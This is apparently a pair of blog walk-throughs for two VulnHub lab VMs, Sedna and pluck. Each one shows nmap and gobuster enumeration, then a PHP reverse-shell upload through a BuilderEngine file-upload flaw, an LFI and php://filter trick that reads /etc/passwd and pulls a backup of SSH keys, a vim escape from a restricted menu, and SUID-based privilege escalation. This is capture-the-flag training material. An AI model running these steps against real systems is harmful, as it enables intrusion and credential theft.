hackfest2016: Sedna Walk-through

Hi There,

In this post I will walk-through the hackfest2016: Sedna VM So Let’s start !

Enumeration:

We will scan all TCP ports along with top UDP ports

root@kali:~/vulnhub/sedna# nmap -sS -p- -A --reason 192.168.17.156  \
> && nmap -sU -sV -A --top-ports 100 192.168.17.156 \
> && nmap -sU -p 161 192.168.17.156 \
> && nmap -sU -p 69 192.168.17.156

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:35 +03
Nmap scan report for 192.168.17.156
Host is up, received arp-response (0.0011s latency).
Not shown: 65523 closed ports
Reason: 65523 resets
PORT      STATE SERVICE     REASON         VERSION
22/tcp    open  ssh         syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
|   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_  256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp    open  domain      syn-ack ttl 64 ISC BIND 9.9.5-3-Ubuntu
| dns-nsid: 
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp    open  http        syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL STLS TOP CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          32833/tcp  status
|_  100024  1          55738/udp  status
139/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        syn-ack ttl 64 Dovecot imapd (Ubuntu)
|_imap-capabilities: more IDLE LOGIN-REFERRALS post-login STARTTLS Pre-login LITERAL+ IMAP4rev1 LOGINDISABLEDA0001 capabilities listed have OK ID SASL-IR ENABLE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
445/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    syn-ack ttl 64 Dovecot imapd (Ubuntu)
|_imap-capabilities: IDLE LOGIN-REFERRALS post-login more AUTH=PLAINA0001 LITERAL+ IMAP4rev1 capabilities Pre-login listed have OK ID SASL-IR ENABLE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
995/tcp   open  ssl/pop3    syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE USER SASL(PLAIN) TOP CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
8080/tcp  open  http        syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
32833/tcp open  status      syn-ack ttl 64 1 (RPC #100024)
MAC Address: 00:0C:29:E7:55:B6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -32s, deviation: 0s, median: -32s
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   NetBIOS computer name: SEDNA\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-04-27T10:35:56-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   1.08 ms 192.168.17.156

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.96 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:38 +03
Nmap scan report for 192.168.17.156
Host is up (0.00091s latency).
Not shown: 49 closed ports, 47 open|filtered ports
PORT     STATE SERVICE    VERSION
53/udp   open  domain     ISC BIND 9.9.5-3-Ubuntu
| dns-nsid: 
|_  bind.version: 9.9.5-3-Ubuntu
|_dns-recursion: Recursion appears to be enabled
111/udp  open  rpcbind    2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          32833/tcp  status
|_  100024  1          55738/udp  status
137/udp  open  netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
5353/udp open  mdns       DNS-based service discovery
| dns-service-discovery: 
|   9/tcp workstation
|_    Address=192.168.17.156 fe80:0:0:0:20c:29ff:fee7:55b6
MAC Address: 00:0C:29:E7:55:B6 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: SEDNA

Host script results:
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.91 ms 192.168.17.156

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 268.13 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:42 +03
Nmap scan report for 192.168.17.156
Host is up (0.00092s latency).
PORT    STATE  SERVICE
161/udp closed snmp
MAC Address: 00:0C:29:E7:55:B6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.09 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:42 +03
Nmap scan report for 192.168.17.156
Host is up (0.0012s latency).
PORT   STATE  SERVICE
69/udp closed tftp
MAC Address: 00:0C:29:E7:55:B6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

There is 2 web application on port 80 and 8080, I did try to hack the tomcat server at port 8080 by abusing the PUT HTTP method However turns out the Nmap scan result is false. Also I could not log in to manager panel on tomcat by defaults credentials or common password.

Now let’s try hacking the web application on port 80, there is nothing interesting just HTML page with planet photo. in this case I will brute force directories.

gobuster -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e -u http://192.168.17.156

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.17.156/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 302,307,403,500,200,204,301
[+] Expanded     : true
=====================================================
http://192.168.17.156/.htaccess (Status: 403)
http://192.168.17.156/.hta (Status: 403)
http://192.168.17.156/.htpasswd (Status: 403)
http://192.168.17.156/blocks (Status: 301)
http://192.168.17.156/files (Status: 301)
http://192.168.17.156/index.html (Status: 200)
http://192.168.17.156/modules (Status: 301)
http://192.168.17.156/robots.txt (Status: 200)
http://192.168.17.156/server-status (Status: 403)
http://192.168.17.156/system (Status: 301)
http://192.168.17.156/themes (Status: 301)
=====================================================

themes directory seems interesting.

After browsing the directories, We can tell the application BuilderEngine is used.

So I did search for submitted exploit on exploit-db.com and found this one

Exploitation:

basically this exploit will make a POST request to the web application and upload any arbitrary file, I edited the exploit to point to the VM IP address then try to upload the famous php-reverse-shell after editing my listening IP and port.

root@kali:~/vulnhub/sedna# cat > upload.html
<html>
<body>
<form method="post" action="http://192.168.17.156/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
    <input type="file" name="files[]" />
    <input type="submit" value="send" />
</form>
</body>
</html>
^C

Then get the following response from t he application.

Now all we have to do is reach the file in the files directory as mentioned in the exploit. Setting NC listener to get the reverse shell.

http://192.168.17.156/files/php-reverse-shell.php

after looking around a bit we got the first flag:

Privilege Escalation:

I always try kernel exploits at first but this time could not get a root shell after trying many. I did try the dirtyc0w kernel exploit since the victim system fit and luckily this works.

pluck: 1 walk-through

In this post we will walk-through the pluck: 1 VM So let’s start !

Enumeration:

We will scan all TCP ports along with top UDP ports

root@kali:~/vulnhub/pluck# nmap -sS -p- -A --reason 192.168.17.153  \
> && nmap -sU -sV -A --top-ports 100 192.168.17.153 \
> && nmap -sU -p 161 192.168.17.153 \
> && nmap -sU -p 69 192.168.17.153 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:32 +03
Nmap scan report for 192.168.17.153
Host is up, received arp-response (0.0010s latency).
Not shown: 65531 closed ports
Reason: 65531 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_  256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open  mysql   syn-ack ttl 64 MySQL (unauthorized)
5355/tcp open  llmnr?  syn-ack ttl 1
MAC Address: 00:0C:29:1E:99:39 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.05 ms 192.168.17.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.03 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:34 +03
Nmap scan report for 192.168.17.153
Host is up (0.00061s latency).
Not shown: 98 closed ports
PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.17.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.24 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for 192.168.17.153
Host is up (0.00074s latency).
PORT    STATE  SERVICE
161/udp closed snmp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for 192.168.17.153
Host is up (0.00056s latency).
PORT   STATE         SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds

The website on port 80 is powered by PHP, I did try many PHP tricks to check for vulnerabilities and discovered that the site is prone to LFI and PHP base64-encode trick !

http://192.168.17.153/index.php?page=/etc/passwd

now we have a list of users:

  • bob
  • peter
  • paul
  • backup-user

Exploitation

I did try to brute-force , SQLi the admin login page but no luck.

Next I went back to the users list and tried to include the backup script mentioned in login shell of backup-user

http://192.168.17.153/index.php?page=/usr/local/scripts/backup.sh

We can try to include the tar file but this will be a total mess ! so let’s make a use of PHP base64-encode trick to download the file safely by encoding the data of backup.tar file then cut the HTML around it and decode it locally.

curl http://192.168.17.153/index.php?page=php://filter/convert.base64-encode/resource=/backups/backup.tar | grep 'jumbotron>' | cut -d '>' -f 2 | cut -d '<' -f 1 > backup.tar64
base64 -d backup.tar64 > backup.tar
mkdir backup ; tar -xvf backup.tar -C backup

After extracting the file We notice the existence of keys folder containing SSH keys of the user Paul, We will test the keys until we get a valid SSH login

ssh paul@192.168.17.153 -i id_key4

We are presented with shell login of menu type in this case Pdmenu, However We can escape this menu by selecting Edit file and type any file name to start using the vim.

:set shell=/bin/bash

Then type the following to jump on Bash

:shell

Privilege Escalation

I did try to escalate using Kernel exploits but no luck, However after searching for SUIDs We can notice the existence of exim agent.

paul@pluck:~$ find / -perm -u=s -type f 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g

I did try some exploits to escalate the privilege using exim agent but did not work for me, However I decided to give this exploit a shot since the difference in version is minimal and luckily this exploit works.

Flag:

 

 

 

 

 

 

 

and that’s it.